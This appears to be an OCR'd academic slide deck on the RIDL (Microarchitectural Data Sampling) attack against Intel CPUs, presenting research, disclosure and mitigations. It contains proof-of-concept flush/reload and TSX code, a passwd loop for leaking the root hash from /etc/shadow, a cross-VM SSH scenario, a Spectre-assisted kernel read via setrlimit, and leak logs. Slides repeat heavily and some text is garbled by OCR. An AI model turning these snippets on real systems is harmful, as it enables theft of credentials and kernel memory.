| Processor<br>Model       | Variant 1<br>(Bounds<br>Check<br>Bypass; also<br>known as<br>Spectre) | Variant 2<br>(Branch<br>Target<br>Injection; also<br>known as<br>Spectre) | Variant 3<br>(Rogue Data<br>Cache Load;<br>also known as<br>Meltdown) | Variant 3a<br>(Rogue System<br>Register Read;<br>also known as<br>Meltdown) | Variant 4 (Rogue System Register Read) | Variant<br>5<br>(L1<br>Terminal<br>Fault) |  |
| Intel® Core™<br>i9-9900k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |  |
| Intel® Core™<br>i7-9700k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |  |
| Intel® Core™<br>i5-9600k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |  |

Intel announces Coffee Lake Refresh

- FIIIIIWaic
- Operating systems
- Virtual Machine Manager\*

System manufacturers have incorporated these updates. Some Intel products may contain hardware mitigations. See the table below for mitigation details:

|                          | Vulnerability and Mitigation Method                                   |                                                                           |                                                                       |                                                                             |                                        |                               |  |
|--------------------------|-----------------------------------------------------------------------|---------------------------------------------------------------------------|-----------------------------------------------------------------------|-----------------------------------------------------------------------------|----------------------------------------|-------------------------------|--|
| Processor<br>Model       | Variant 1<br>(Bounds<br>Check<br>Bypass; also<br>known as<br>Spectre) | Variant 2<br>(Branch<br>Target<br>Injection; also<br>known as<br>Spectre) | Variant 3<br>(Rogue Data<br>Cache Load;<br>also known as<br>Meltdown) | Variant 3a<br>(Rogue System<br>Register Read;<br>also known as<br>Meltdown) | Variant 4 (Rogue System Register Read) | Variant 5 (L1 Terminal Fault) |  |
| Intel® Core™<br>i9-9900k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                      |  |
| Intel® Core™<br>i7-9700k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                      |  |
| Intel® Core™<br>i5-9600k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                      |  |

In-silicon mitigations against Meltdown and Foreshadow

- FIIIIIVVaic
- Operating systems
- Virtual Machine Manager\*

System manufacturers have incorporated these updates. Some Intel products may contain hardware mitigations. See the table below for mitigation details:

|                          | Vulnerability and Mitigation Method                                   |                                                                           |                                                                       |                                                                             |                                        |                                           |  |
|--------------------------|-----------------------------------------------------------------------|---------------------------------------------------------------------------|-----------------------------------------------------------------------|-----------------------------------------------------------------------------|----------------------------------------|-------------------------------------------|--|
| Processor<br>Model       | Variant 1<br>(Bounds<br>Check<br>Bypass; also<br>known as<br>Spectre) | Variant 2<br>(Branch<br>Target<br>Injection; also<br>known as<br>Spectre) | Variant 3<br>(Rogue Data<br>Cache Load;<br>also known as<br>Meltdown) | Variant 3a<br>(Rogue System<br>Register Read;<br>also known as<br>Meltdown) | Variant 4 (Rogue System Register Read) | Variant<br>5<br>(L1<br>Terminal<br>Fault) |  |
| Intel® Core™<br>i9-9900k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |  |
| Intel® Core™<br>i7-9700k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |  |
| Intel® Core™<br>i5-9600k | OS/VMM                                                                | Firmware +OS                                                              | Hardware                                                              | Firmware                                                                    | Firmware<br>+OS                        | Hardware                                  |  |

Let's buy the Intel Core i9-9900K!

... and send another invoice to our professor Herbert Bos



We got it the day after we submitted the paper

===

RIDL works regardless of these in-silicon mitigations

# **AMD**

We also tried to reproduce it on AMD

## **AMD**

We also tried to reproduce it on AMD

RIDL does *not* affect AMD



But where are we *actually* leaking from?





Previous attacks had it *easy*, they leak from caches



Caches are well documented and well understood.



But RIDL does *not* leak from caches!



But what else is there to leak from?



There are other internal CPU buffers



Line Fill Buffers, Store Buffers and Load Ports



But there is more!



**Uncached Memory** 

We can leak from various internal CPU buffers!

RIDL is a **class** of speculative execution attacks also known as **M**icro-architectural **D**ata **S**ampling

Let's focus on one particular instance:

## **Line Fill Buffers**

#### **MANUALS**

MEM\_LOAD\_UOPS\_RETIRED.HIT\_LFB\_PS - Counts demand loads that hit in the line fill buffer (LFB). A LFB entry is allocated every time a miss occurs in the L1 DCache. When a load hits at this location it means that a previous load, store or hardware prefetch has already missed in the L1 DCache and the data fetch is in progress. Therefore the cost of a hit in the LFB varies. This event may count cache-line split loads that miss in the L1 DCache but do not miss the LLC.

On 32-byte Intel AVX loads, all loads that miss in the L1 DCache show up as hits in the L1 DCache or hits in the LFB. They never show hits on any other level of memory hierarchy. Most loads arise from the line fill buffer (LFB) when Intel AVX loads miss in the L1 DCache.

- We first read the manuals
- Some references to internal CPU buffers
- But no further explanation
- Where would you even start?

That's why we started reading patents instead!



We read a lot of patents, and survived!

So today I can tell you a bit more about them

But wait, what are these

Line Fill Buffers?









### Multiple roles:

- Asynchronous memory requests
- Load squashing
- Write combining
- Uncached memory

### Multiple roles:

- <u>Asynchronous memory requests</u>
- Load squashing
- Write combining
- Uncached memory

**CPU design**: what to do on a cache miss?

- Send out memory request
- Wait for completion
- Blocks other loads/stores

**Solution**: keep track of address in LFB

- Send out memory request
- Allocate LFB entry
- Store address in LFB
- Serve other loads/stores
- Pending request *eventually* completes

**Solution**: keep track of address in LFB

- Send out memory request
- Allocate LFB entry
- Store address in LFB
- Serve other loads/stores
- Pending request *eventually* completes

Allocate LFB entry

May contain data from previous load

RIDL exploits this

# **EXPERIMENTS**

Experiments in the paper

## **EXPERIMENTS**



Experiments in the paper

# **EXPERIMENTS**



Experiments in the paper

## **EXPERIMENTS**



Conclusion: our primary RIDL instance leaks from Line Fill Buffers

Cool... so how do we actually mount a RIDL attack?

# **IDEAS**

- We can leak in-flight data
- Let's get some sensitive data in-flight!

# LOCAL ATTACKER

# /ETC/SHADOW

```
$ strace passwd 2>&1
...

openat(
  AT_FDCWD,
  "/etc/shadow",
  O_RDONLY|O_CLOEXEC
)
```

## **CONFUSED DEPUTY**

- passwd opens /etc/shadow
- Can we get this on the other Hyper-Thread?

taskset -c 3 ./passwd.sh

```
while true; do
   passwd -S;
done
```

What does this program look like?

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)NULL;
   char *p = probe + byte * 4096;
   *(volatile char *)p;
   _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```



```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)NULL;
   char *p = probe + byte * 4096;
   *(volatile char *)p;
   _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```



```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)NULL;
   char *p = probe + byte * 4096;
   *(volatile char *)p;
   _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```



```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)NULL;

   Leak in-flight data from an invalid or
        unmapped page, also works for
        demand paging.
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
   t0 = __rdtsc();
   *(volatile char *)(probe + i * 4096);
   dt = __rdtsc() - t0;
}</pre>
```



```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)NULL;
   char *p = probe + byte * 4096;
   *(volatile char *)p;
   _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```



```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
Use the leaked byte as an index into our probe array.

*(volatile char *)p;
_xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```



```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```



```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)NULL;
   char *p = probe + byte * 4096;
   *(volatile char *)p;
   _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

| SL | ٠Ο' | W |  |
|----|-----|---|--|
|    |     |   |  |
|    |     |   |  |
|    |     |   |  |
|    |     |   |  |
|    |     |   |  |
|    |     |   |  |
|    |     |   |  |
|    |     |   |  |

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

#### **Probe Array**

**SLOW** 

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
  char byte = *(volatile char *)NULL;
  char *p = probe + byte * 4096;
  *(volatile char *)p;
  _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

#### **Probe Array**

**SLOW** 

```
for (i = 0; i < 256; ++i) {
    _mm_clflush(probe + i * 4096);
}
```

#### (2) RIDL

```
if (_xbegin() == _XBEGIN_STARTED) {
   char byte = *(volatile char *)NULL;
   char *p = probe + byte * 4096;
   *(volatile char *)p;
   _xend();
}
```

## (3) RELOAD

```
for (i = 0; i < 256; ++i) {
    t0 = __rdtsc();
    *(volatile char *)(probe + i * 4096);
    dt = __rdtsc() - t0;
}</pre>
```

**Probe Array** 

**FAST** 



RIDL is like drinking from a fire hose



You just get whatever data is in flight!

We need to **synchronize** or do some **post-processing** 

We need to **synchronize** or do some **post-processing** 

• Synchronize: could be done using cache attacks, but we're lazy

We need to **synchronize** or do some **post-processing** 

- Synchronize: could be done using cache attacks, but we're lazy
- <u>Post-processing</u>: we can repeat measurements, stitch them together?

### **FILTERING DATA**

How can we filter data?

- We want to leak from /etc/shadow
- First line /etc/shadow is for root
- Starts with "root:"
- Use prefix matching:
  - **Match** ⇒ we learn a new byte
  - **No Match** ⇒ discard

# **FILTERING**

Known Prefix

| r | 0 | 0 | t | : |  |  |  |
|---|---|---|---|---|--|--|--|
|---|---|---|---|---|--|--|--|

# **FILTERING**

#### Known Prefix

| r | 0 | 0 | t | : |  |  |  |
|---|---|---|---|---|--|--|--|
|---|---|---|---|---|--|--|--|

|  | h | t | t | р | S | : | / | 1 |
|--|---|---|---|---|---|---|---|---|
|--|---|---|---|---|---|---|---|---|

**Known Prefix** 

r o o t :

No Match

h t t p s : / /

## **Known Prefix**



## No Match

| h | t | t | р | S | : | / | 1 |
|---|---|---|---|---|---|---|---|
|---|---|---|---|---|---|---|---|



## Known Prefix



# No Match



## Match



## Known Prefix



## No Match



## Match





## Known Prefix



## No Match



### Match



# No Match



## Known Prefix



## No Match



### Match



### No Match



r o o t : S p /

# **Known Prefix**



## No Match



### Match



### No Match



## Match



# **CHALLENGES**

# **RESULT**

We can leak the **root password hash** from an **unprivileged user** 

# **RESULT**

We can leak the **root password hash** from an **unprivileged user** 

Let's extend this a bit...

# **RESULT**

We can leak the **root password hash** from an **unprivileged user** 

Let's extend this a bit...

to the **cloud!** 

Victim VM

Victim VM in the cloud

Attacker VM

We get a VM on the same server

Victim VM

Attacker VM

Line Fill Buffers

Victim VM

We make sure it is co-located

Attacker VM

Line Fill Buffers

Victim VM

/etc/shadow

SSH server

Victim VM runs an SSH server

Attacker VM

Line Fill Buffers

Victim VM

/etc/shadow

SSH server

How do we get data in flight?

Attacker VM

SSH client

Line Fill Buffers

Victim VM

/etc/shadow

SSH server

We run an SSH client...



... that keeps connecting to the SSH server



The SSH server loads /etc/shadow through LFB



The contents from /etc/shadow are in flight

# **LEAKING**

Attacker VM

SSH client

Line Fill Buffers

Victim VM

/etc/shadow

SSH server

Now that the data is in flight, we want to leak it

# **LEAKING**

Attacker VM
RIDL
SSH client

Line Fill Buffers Victim VM
/etc/shadow
SSH server

We run our RIDL program on our server...

# **LEAKING**



...which leaks the data from the LFB

# WHAT ELSE?

# **SPECTRE**



# **RIDL + SPECTRE**

- We can use Spectre in combination with RIDL
- Train branch predictor to trust us
- Surprise it with an unexpected pointer

# **RIDL + SPECTRE**

Time

p = system call parameter

if (p points to userspace)

read memory from p

# ARBITRARY KERNEL LEAK

- copy\_from\_user() can access arbitrary user-supplied pointer
- Repeatedly call setrlimit() with valid user pointer to **train branch predictor**
- After training, we supply it a kernel **pointer we want to leak**
- Will be executed speculatively, pulled into LFB
- At the same time we **leak using RIDL**

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

User

```
setrlimit(..., 0x00007fffff74ad30);
```

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

User

```
setrlimit(..., 0x00007ffffff74ad30);
```

# User

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

```
setrlimit(..., 0x00007ffffff74ad30);
```

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

User

```
setrlimit(..., 0x00007ffffff74ad30);
```

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

User

```
setrlimit(..., 0x00007ffffff74ad30);
```

# User

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

User

```
setrlimit(..., 0xffff80000fd1c950);
```

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

User

```
setrlimit(..., 0xffff80000fd1c950);
```

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

User

```
setrlimit(..., 0xffff80000fd1c950);
```

#### User

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

```
setrlimit(..., 0xffff80000fd1c950);
```

## Victim

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

User

```
setrlimit(..., 0xffff80000fd1c950);
```

#### **Victim**

```
int setrlimit(unsigned int resource,
    struct rlimit __user *rlim) {
  copy_from_user(..., rlim, ...);
unsigned long copy_from_user(void *to,
    const void __user *from,
    unsigned long n) {
  if (likely(access_ok(from, n)))
    raw_copy_from_user(to, from, n);
  return n;
```

User

# WHAT NEXT??

We attacked the **cloud** and have an **arbitrary kernel read**.

We still need a local account on the target...



# **PORTABILITY**

- No TSX or other speculation mechanisms
- Can't use invalid pointers
- clflush is too useful

# **PORTABILITY**

- No clflush
  - Touch eviction sets
- No TSX/invalid pointers
  - Use **demand paging** to generate "valid" page faults

## **PORTABILITY**

```
/* Evict buffer from cache. */
evict(buffer);
/* Speculatively load the secret. */
char value = *(new_page);
/* Calculate the corresponding entry. */
char *entry ptr = buffer + (1024 * value);
/* Load that entry into the cache. */
*(entry ptr);
/* Time the reload of each buffer entry to
   see which entry is now cached. */
for(k=0; k<256; ++k) {
 t0 = cycles();
 *(buffer + 1024 * k);
 if (cycles - t0 < 100) ++results[k];
```

We can generate this code from **WebAssembly**!

```
(sebastion)crek Offgenell [5 ./victim.sh
  sebastion/sords: Officerally 31 :/attack.dt
Press any key to do BIDS, SpiderMorkey attack.
• taskset -c 7 ./3s ridl-shell.js
[ 106 ] - Down Init!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          WITH T P FERMING .
  106 ] - ---- SHOR TIME ----
  104 ] - [8-48]
                                                                                                                        - 96 6
   106 1 - (BNRS)
     106 ] - [MaSe]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                over _storibute_((alignes(see())) buffer(see(s))
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              mmat(biffer, bitt, bif(i))
gas whitelo('mmois DV), Moodfile'(bitt)', poolf');
gas whitelo('mmois':'o'(biffer));
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sette (I) (
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           see which of the state of the s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "Wichin.C" IBL, 4220
   I surek citients want vie
```

```
[ LOG ] - [0x20]
                     = 12
[ LOG ] - [0x49]
                     = 67
                           Τ
[ LOG ] - [0 \times 74]
                     = 46 t
[ LOG ] - [0x27]
                     = 23
[ LOG ] - [0x73]
                     = 111 s
                     = 36
[ LOG ] - [0x20]
[ LOG ] - [0x6d]
                     = 101
                           m
[ LOG ] - [0x65]
                     = 109
[ LOG ] - [0x20]
                     = 116
                     = 69
[ LOG ] - [0x4d]
[L0G] - [0x61] = 125
[ LOG ] - [0x72]
                     = 162
                     = 125 i
[ LOG ] - [0x69]
[LOG] - [0x6f] = 72
[ LOG ] - [0x21]
                     = 13 !
[ LOG ] - [0x22]
                     = 10
[ LOG ] - Time16.45495575
[ LOG ] - 0.9115794796348814B/s
pit@cutiesky:~/ridl-js$ exit
```

## **MORE EXAMPLES**

Also mentioned in our paper:

- Leaking from ports
- Reading SGX registers (again..)
- Leaking internal CPU data (e.g. page tables)

# **MITIGATIONS**

## **EXISTING MITIGATIONS**

Before May, three mechanisms:

- Inhibit Trigger (stop speculation, fences, retpoline)
- Hide Secret (KPTI, array index masking, L1D flush)
- Disrupt channel of leakage (disable timers)

Introduced in May:

- Same-thread:
  - verw overwrites affected buffers
  - Special Assembly snippets

# MD\_CLEAR WORKARAOUND

```
__asm__ _volatile_ (
"lfence\n\t"
        "orpd (%1), %%xmm0\n\t"
        "orpd (%1), %%xmm0\n\t"
        "xorl %%eax, %%eax\n\t"
        "1:clflushopt 5376(%0,%%rax,8)\n\t"
        "addl $8, %eax\n\t"
        "cmpl $8*12, %%eax\n\t"
        "jb 1b\n\t"
        "sfence\n\t"
        "movl $6144, %ecx\n\t"
        "xorl %%eax, %%eax\n\t"
        "rep stosb\n\t"
        "mfence\n\t"
       : "+D" (dst)
       : "r" (zero ptr)
       : "eax", "ecx", "cc", "memory"
);
```

Introduced in May:

- Same-thread:
  - verw overwrites affected buffers
  - Special Assembly snippets
- Cross-thread:
  - Complex scheduling and synchronization





- Same-thread:
  - verw overwrites affected buffers
  - Special Assembly snippets
- Cross-thread:
  - Complex scheduling and synchronization
  - <u>Disable Intel Hyper-Threading</u>®

# **SPOT MITIGATIONS**

# **FUTURE OF MITIGATIONS**

Looking at our diagram, there might be other issues...



# TAKE HOME MESSAGE

These issues **need to be fixed!** 

# HardFails: Insights into Software-Exploitable Hardware Bugs

Ghada Dessouky, David Gens, Arun Kanuparthi, Hareesh Khattri, Jason M. Fung, Ahmad-Reza Sadeghi and Jeyavijayan Rajendran

Technische Universität Darmstadt;

**Texas A&M University**;

**Intel Corporation** 

Disclosure process

Sep Oct Nov Dec Jan Feb Mar Apr May















# https://mdsattacks.com



# **MDS TOOL**

Stephan wrote a tool to verify your system:



# **CONCLUSION**

- Spectre and Meltdown, just one mistake?
- New **class** of speculative execution attacks
- Many more buffers other than caches to leak from
- How many bugs are left?

## **CONCLUSION**

- Spectre and Meltdown, just one mistake?
- New **class** of speculative execution attacks
- Many more buffers other than caches to leak from
- How many bugs are left?
- https://mdsattacks.com